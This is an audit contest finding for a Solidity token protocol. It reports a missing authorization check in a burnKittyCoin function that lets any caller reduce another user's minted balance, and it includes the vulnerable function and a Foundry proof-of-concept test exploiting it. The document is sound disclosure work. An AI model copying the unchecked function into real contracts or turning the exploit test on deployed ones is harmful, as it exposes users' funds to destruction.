Submission Details
Severity:
Burning anyone's tokens
Summary
The protocol allows a user to burn whoever's tokens he wants.
Vulnerability Details
There are no checks if the msg.senderis allowed to burn the _onBehalfOf address.
function burnKittyCoin(address _onBehalfOf, uint256 _ameownt) external {
kittyCoinMeownted[_onBehalfOf] -= _ameownt;
i_kittyCoin.burn(msg.sender, _ameownt);
}
Impact
Due to the lack of checks if the msg.senderis allowed to burn the tokens of the _onBehalfOfaddress. He can burn anyone's tokens with repercussions.
address user2 = makeAddr("user2");
function setUp() external {
HelperConfig helperConfig = new HelperConfig();
config = helperConfig.getNetworkConfig();
weth = config.weth;
deal(weth, user, AMOUNT);
deal(weth, user2, AMOUNT);
...
function test_UserCanBurnAnyonesToken() public {
uint256 toDeposit = 5 ether;
uint256 amountToMint = 8e18;
uint256 toBurn = 5e18;
vm.startPrank(user);
IERC20(weth).approve(address(wethVault), toDeposit);
kittyPool.depawsitMeowllateral(weth, toDeposit);
kittyPool.meowintKittyCoin(amountToMint);
vm.stopPrank();
vm.prank(user2);
kittyPool.burnKittyCoin(user, toBurn);
assertEq(kittyPool.getKittyCoinMeownted(user), 3e18);
}
Tools Used
Foundry
Recommendations
There should be a check if the _onBehalfOfaddress has allowed the msg.senderto use his tokens.
Rewards breakdown
nSLOC
224This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.